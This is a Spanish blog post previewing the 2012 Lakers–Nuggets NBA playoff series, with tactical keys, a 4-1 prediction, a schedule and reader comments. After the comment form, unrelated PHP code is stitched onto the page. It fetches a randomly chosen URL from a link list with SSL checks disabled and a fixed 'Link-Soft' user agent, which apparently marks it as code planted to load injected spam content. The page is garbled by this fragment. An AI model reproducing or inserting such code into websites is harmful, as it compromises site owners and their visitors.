Análisis: L.A. Lakers (3) vs Denver Nuggets (6)

29 de April de 2012 por MagicJohnson32

Regular: 3-1

Lakers: 97.3 PF – 95.9 PC

Nuggets: 104.1 PF – 101.2 PC

Lakers y Nuggets vuelven a enfrentarse en Playoffs tras las victorias de los californianos en la primera ronda de 2008 (4-0) y en las Finales de Conferencia de 2009 (4-2). Ya no están Melo, Billups y Nenê; tampoco Odom, Fisher y Phil Jackson. Lo que nos queda es, más que una eliminatoria, un choque de estilos. Difícilmente encontraremos en la liga dos equipos con virtudes y defectos tan opuestos. La propuesta de George Karl se fundamenta en la juventud y profundidad de su plantilla y es radical en su realización; la de Mike Brown, por el contrario, trata de explotar el inmenso talento de su trío estelar y ralentizar la velocidad del juego a partir del dominio en el rebote.

El balance de los enfrentamientos de regular season entre ambos equipos ha sido favorable para los Lakers, que se han impuesto en tres de los cuatro partidos, aunque todos resultaron muy igualados y, de hecho, la victoria más amplia fue el 99-90 logrado por los Nuggets. Llama la atención, repasando estos partidos, que Denver no ha alcanzado la centena de puntos contra los Lakers esta temporada pese a ser el equipo más anotador de la liga. La tarea se presenta imposible para los de Colorado si no imponen su ritmo y minimizan la influencia de Gasol y Bynum en el juego.

Claves de la eliminatoria

– Estático vs transición. O, en otras palabras, centímetros vs velocidad. Los Nuggets lideran la NBA en puntos al contraataque con 20 por noche. Los Lakers no solo no anotan a la contra sino que sufren en la transición defensiva. Gasol y Bynum forman la mejor pareja interior de la liga y suponen una gran amenaza de rebote ofensivo. Así, los Lakers disponen de frecuentes segundas oportunidades, pero cuando el rival asegura el rebote defensivo o roba un balón, los angelinos se ven en inferioridad ante los equipos que se despliegan rápidamente. En esas situaciones, la velocidad de Ty Lawson y el criterio de Andre Miller generan tiros cómodos para Afflalo, Harrington y Gallinari, especialmente peligrosos en transición. ¿Permanecerá Karl fiel a esta apuesta? ¿O echará mano de sus 7 pies -McGee,  Koufos y Mozgov- para frenar al juego interior de los Lakers? Lo último sería un error.

– Banquillos vs titulares. Al Harrington comanda un banquillo magnífico, pese a las bajas de Wilson Chandler y Rudy Fernández. Los suplentes de los Nuggets anotan prácticamente el doble que los de los Lakers (41.4 puntos de media por 21). Sin apenas anotación desde el banquillo, con Matt Barnes tocado y ante la ausencia de Metta World Peace en toda la primera ronda (regresaría para un séptimo partido), los Lakers van a necesitar una aportación consistente y efectiva de sus titulares. El papel de Ramon Sessions, quien deberá frenar a Lawson, se presenta clave.

– Kobe. Desde hace un par de temporadas, a Bryant no se le dan bien los Nuggets. De hecho, se le dan fatal. Sus porcentajes de tiro en los últimos partidos ante el equipo de George Karl han sido particularmente bajos. La única derrota de los Lakers ante los Nuggets este año coincidió con el peor partido de Kobe, y una de las victorias angelinas se produjo con él lesionado. Sin embargo, en las dos últimas eliminatorias de Playoffs entre Lakers y Nuggets, Kobe fue determinante con una espectacular media de 34 puntos en los diez encuentros disputados en aquellas dos series. Denver, por tanto, necesita limitar el acierto en el tiro de Bryant, capaz como nadie de romper los partidos con una buena racha. Al renunciar al título de máximo anotador (le habría ‘bastado’ con 38 puntos ante los Kings), Kobe envía un mensaje claro: lo único que importa son los Playoffs y el anillo.

Pronóstico

4-1 Lakers

Calendario (hora española)

Partido 1 – Domingo 29 de abril en Los Angeles (21h30)
Partido 2 – Miércoles 2 de mayo en Los Angeles (04h30)
Partido 3 – Sábado 5 de mayo en Denver (04h30)
Partido 4 – Lunes 7 de mayo en Denver (03h30)
Partido 5 – Martes 8 de mayo en Los Angeles
Partido 6 – Jueves 10 de mayo en Denver
Partido 7 – Sábado 12 de mayo en Los Angeles

Comenta

13 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Pronóstico demasiado optimista. 4-3 el mío. El Staples será la clave, no pueden empezar haciendo el tonto esta noche… en el Pepsi Center veo ultramotivados a los Nuggets. Serán muy peligrosos allí

      Citar

  2. simon dice:
    #2

    El pronostico me parece bien si Los Lakers no fueran los Lakers… Creo que se dejarán un par de partidos por pura desidia asi que mi pronostico es un 4-2. Fantastico análisis.

      Citar

  3. rumbero dice:
    #3

    Excelente análisis. Teniendo en cuenta estas claves de la eliminatoria, a mi también me da que los Lakers se pueden dejar uno o dos partidos. Tengo ganas de ver a que Kobe veremos ahora que empieza lo bueno. Será la clave para ver hasta donde llegan los Lakers. Y ganas de ver a Pau también, después de la caña que le dieron en los PO del año pasado.
    4-2 Lakers

      Citar

  4. Lost dice:
    #4

    Yo veo un 4-2 para los Lakers, incluso un 4-3 debido a que los partidos se antojan muy igualados. Para mí, los Nuggets ganan 1 de los 2 primeros en el Staples y perderán en Colorado.
    PD: Cuidado con los árbitros, pueden ser claves

      Citar

  5. Nacho dice:
    #5

    Ufff, que mal rollo me da el que hablemos de los árbitros antes de tiempo.
    Muy mal rollo, antes o después.
    Ayer Miami se pasó por la piedra a NY, pero por la piedra de verdad, y los árbitros estuvieron caserillos, vale. Pero cifrar la derrota en eso, es cuanto menos sarcástico. Demasiado Mourinhismo veo.
    ¿Los árbitros clave?, bueno, la liga que permitió el tongo de sessions… o que milongas más vamos a decir…
    Ganan Lakers el anillo (con ayuda arbitral y de Stern), y esta serie será la más chunga.

      Citar

  6. Sancho88 dice:
    #6

    Yo siendo de los Kings tengo motivos para desconfiar de los árbitros. Son culpables hasta que se demuestre lo contrario

      Citar

  7. Lucho dice:
    #7

    Lakers 4-2

      Citar

  8. MagicJohnson32 dice:
    #8

    Wow. Lo de Bynum es DOMINIO. Lleva ya 7 tapones, y los Nuggets están en 16 de 45 en tiros de 2.

      Citar

  9. rumbero dice:
    #9

    MagicJohnson32:
    Wow. Lo de Bynum es DOMINIO. Lleva ya 7 tapones, y los Nuggets están en 16 de 45 en tiros de 2.

      Citar

  10. rumbero dice:
    #10

    Y 10! Triple doble. Se les ha hecho de noche hoy a los chicos de Denver

      Citar

  11. MagicJohnson32 dice:
    #11

    ¿Qué? ¿Todavía os parece demasiado optimista el pronóstico? Porque el +15 del marcador no alcanza a expresar la superioridad de los Lakers hoy.

      Citar

  12. Nacho dice:
    #12

    Jugando así, son equipo de anillo.

      Citar

  13. Tobal dice:
    #13

    Yo apuesto por un 4 – 2 para Lakers,pero yo no les veo favoritos más adelante,creo que Oklahoma y San Antonio,son mejores conjuntos y ante los angelinos serían favoritos,pues estos dependen mucho de Kobe y de la pareja interior Pau Gasol-Bynum,el banquillo aporta muy poco y eso en play offs es un lastre.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>